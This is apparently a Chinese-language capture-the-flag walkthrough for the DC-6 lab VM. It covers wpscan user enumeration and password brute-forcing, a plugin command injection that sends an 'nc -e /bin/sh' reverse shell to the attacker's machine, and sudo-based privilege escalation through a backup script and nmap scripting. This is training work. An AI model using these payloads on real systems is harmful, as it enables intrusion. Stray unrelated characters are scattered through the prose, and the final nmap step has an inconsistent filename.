DC-6
題目描述
DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn't an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:
192.168.0.142 wordy
Clue
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
描述中說到和之前一樣只有一個(gè)Flag,并且需要配置一下HOSTS扒磁,且給了提示
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
知識點(diǎn)總結(jié)
? ①掃描
? ②使用wpscan工具枚舉用戶,結(jié)合提示生成字典進(jìn)行爆破密碼
? ③利用網(wǎng)站插件的命令執(zhí)行漏洞反彈shell
? ④根據(jù)每個(gè)用戶可以執(zhí)行的操作進(jìn)行提權(quán)
? ⑤nmap提權(quán)
1.掃描局域網(wǎng)主機(jī)
arp-scan -l
目標(biāo)IP為:192.168.2.132
2.掃描端口
nmap -sV -p- 192.168.2.132
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
可以看到開放了ssh端口和web端口
3.配置hosts
題目描述已經(jīng)說了,我們需要配置一下hosts文件
Windows下在 C:\windows\system32\drivers\etc\hosts
打開后在末尾添加
192.168.2.132 wordy
Linux下在/etc/hosts
vim /etc/hosts
添加 192.168.2.132 wordy
4.訪問web
是一個(gè)WordPress網(wǎng)站愧杯,kali有專門的掃描工具wpscan晾咪,我們可以使用工具掃描一下
在掃描之前先來掃一下目錄
5.使用dirsearch掃描目錄
發(fā)現(xiàn)的登錄地址
6.使用wpscan掃描用戶
wpscan --url http://wordy/ -e u
發(fā)現(xiàn)了這幾個(gè)用戶收擦,我們將用戶保存到dc6-username.txt中
admin,mark,graham,sarah,jens
7.對用戶密碼進(jìn)行爆破
我們使用cewl來生成字典
cewl -w /root/dc6-passwd.txt http://wordy/
開始爆破
wpscan --url http://wordy/ -U dc6-username.txt -P dc6-passwd.txt
但是這里顯示沒有找到密碼,于是我們想到剛開始的時(shí)候提示有密碼
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
將rockyou.txt里面的帶有k01的面找出來
我們先查看一下rockyou.txt
這里確實(shí)有這個(gè)字典谍倦,將帶有k01的密碼導(dǎo)出來
然后進(jìn)行爆破
wpscan --url http://wordy/ -U dc6-username.txt -P dc6-passwd.txt
找到了mark的密碼為:helpdesk01
登錄后臺發(fā)現(xiàn)有一個(gè)插件
也可以通過wpscan掃描插件
wpscan --url http://wordy --plugins-detection aggressive
8.利用插件漏洞來getshell
首先百度查一下activity-monitor漏洞
可以看到有命令執(zhí)行漏洞
我們用kali的searchsploit來查找漏洞
searchsploit activity monitor
#將html文件復(fù)制到root目錄
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html
#拷貝一份
cp 45274.html 45274.html.bak
#修改一下html內(nèi)容塞赂,將反彈ip改成kali的,提交申請改為目標(biāo)網(wǎng)站
vi 45274.html
然后直接打開網(wǎng)頁提交昼蛀,這里不知道為什么獲取不到shell宴猾,研究一下exp然后去網(wǎng)頁上自己實(shí)現(xiàn)
這里是在activity的插件頁面的tools分類里邊
填I(lǐng)P的地方有個(gè)命令執(zhí)行,我們測試一下
(這里因?yàn)樘領(lǐng)P的地方對長度有限制所以前邊的127.0.0.1刪掉了一部分)
可以看到whoami的命令已經(jīng)被執(zhí)行叼旋,我們在這里反彈一個(gè)shell仇哆,但是我們的shell長度有點(diǎn)長,使用F12修改輸入的長度
然后在kali上監(jiān)聽
#kali
nc -lvp 1234
#發(fā)送payload
1|nc -e /bin/sh 192.168.2.135 1234
可以看到已經(jīng)獲取shell了
同樣夫植,切換一下shell外殼
python -c 'import pty;pty.spawn("/bin/bash")'
先看看這里都有什么文件讹剔,進(jìn)入到home目錄下當(dāng)前用戶的文件夾
發(fā)現(xiàn)一個(gè)txt
發(fā)現(xiàn)了graham的密碼
graham - GSo7isUM1D4
切換到這個(gè)用戶
先查看一下有沒有suid提權(quán) 發(fā)現(xiàn)沒有 再使用sudo -l看一下可以執(zhí)行的命令
可以使用jens用戶來執(zhí)行這個(gè).sh文件
查看一下這個(gè)腳本是什么內(nèi)容
既然我們可以執(zhí)行這個(gè)腳本,我們把/bin/bash放入腳本里详民,以jens用戶執(zhí)行后 就相當(dāng)于獲取了jens的權(quán)限
echo "/bin/bash" >> backups.sh
已經(jīng)寫進(jìn)去了
然后以jens用戶執(zhí)行
sudo -u jens ./backups.sh
已經(jīng)切換到j(luò)ens用戶
再使用sudo -l 查看一下可以執(zhí)行的操作
可以使用nmap延欠,由于nmap是可以執(zhí)行腳本的,我們把root的shell放入腳本里讓nmap執(zhí)行也就相當(dāng)于獲取了root的權(quán)限
#寫入shell
echo 'os.execute("/bin/sh")' > Shell
#name使用script執(zhí)行腳本
sudo nmap --script=shell
獲取root權(quán)限沈跨,查看flag